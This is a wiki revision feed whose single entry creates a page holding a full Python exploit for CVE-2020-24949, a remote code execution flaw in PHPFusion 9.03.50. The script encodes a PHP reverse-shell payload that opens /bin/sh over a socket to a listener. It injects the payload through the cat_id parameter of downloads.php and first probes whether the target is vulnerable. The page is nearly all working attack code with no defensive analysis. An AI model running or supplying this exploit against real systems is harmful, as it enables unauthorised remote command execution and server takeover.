https://pwnwiki.com/index.php?action=history&feed=atom&title=CVE-2020-24949_PHPFusion_9.03.50_%E9%81%A0%E7%A8%8B%E4%BB%A3%E7%A2%BC%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E
CVE-2020-24949 PHPFusion 9.03.50 遠程代碼執行漏洞 - Revision history
2026-04-15T19:40:05Z
Revision history for this page on the wiki
MediaWiki 1.35.1
https://pwnwiki.com/index.php?title=CVE-2020-24949_PHPFusion_9.03.50_%E9%81%A0%E7%A8%8B%E4%BB%A3%E7%A2%BC%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E&diff=3598&oldid=prev
Pwnwiki: Created page with "==EXP== <pre> # Exploit Title: PHPFusion 9.03.50 - Remote Code Execution # Date: 20/05/2021 # Exploit Author: g0ldm45k # Vendor Homepage: https://www.php-fusion.co.uk/home.php..."
2021-05-28T09:44:28Z
<p>Created page with "==EXP== <pre> # Exploit Title: PHPFusion 9.03.50 - Remote Code Execution # Date: 20/05/2021 # Exploit Author: g0ldm45k # Vendor Homepage: https://www.php-fusion.co.uk/home.php..."</p>
<p><b>New page</b></p><div>==EXP==<br />
<pre><br />
# Exploit Title: PHPFusion 9.03.50 - Remote Code Execution<br />
# Date: 20/05/2021<br />
# Exploit Author: g0ldm45k<br />
# Vendor Homepage: https://www.php-fusion.co.uk/home.php<br />
# Software Link: https://www.php-fusion.co.uk/infusions/downloads/downloads.php?cat_id=30&download_id=606<br />
# Version: 9.03.50<br />
# Tested on: Docker + Debian GNU/Linux 8 (jessie)<br />
# CVE : CVE-2020-24949<br />
# Found by: ThienNV<br />
<br />
import requests<br />
import base64<br />
import argparse<br />
<br />
<br />
PAYLOAD = "php -r '$sock=fsockopen(\"127.0.0.1\",4444);exec(\"/bin/sh -i <&4 >&4 2>&4\");' " # !!spaces are important in order to avoid ==!!<br />
REQUEST_PAYLOAD = "/infusions/downloads/downloads.php?cat_id=$\{{system(base64_decode({})).exit\}}"<br />
<br />
<br />
parser = argparse.ArgumentParser(description='Send a payload to a Fusion 9.03.50 server with "Allow PHP Execution" enabled.')<br />
parser.add_argument('target', type=str, help='Turn the Allow PHP Execution verification step on or off.')<br />
parser.add_argument("-v", "--no-verify", action="store_false")<br />
<br />
args = parser.parse_args()<br />
<br />
if args.target.startswith("http://") or args.target.startswith("https://"):<br />
target = args.target<br />
else:<br />
print("[!] Target should start with either http:// or https://")<br />
exit()<br />
<br />
# verify payload<br />
PAYLOAD_B64 = base64.b64encode(PAYLOAD.encode('ascii')).decode("ascii")<br />
if '+' in PAYLOAD_B64 or '=' in PAYLOAD_B64:<br />
print("[!] Invalid payload, make sure it does not contain a + or a =!")<br />
exit()<br />
<br />
# verify vulnerable host<br />
if args.no_verify:<br />
page_data = requests.get(target + "/infusions/downloads/downloads.php?cat_id=${system(ls)}")<br />
if "infusion_db.php" not in page_data.text:<br />
print("[!] Can't seem to find infusion_db.php. QUITTING!")<br />
print("[!] If this validation is wrong just use the --no-verify flag.")<br />
exit()<br />
<br />
<br />
# send request<br />
requests.get(target + REQUEST_PAYLOAD.format(PAYLOAD_B64))<br />
<br />
print("[*] Requests send, did you get what you wanted?")<br />
</pre></div>
Pwnwiki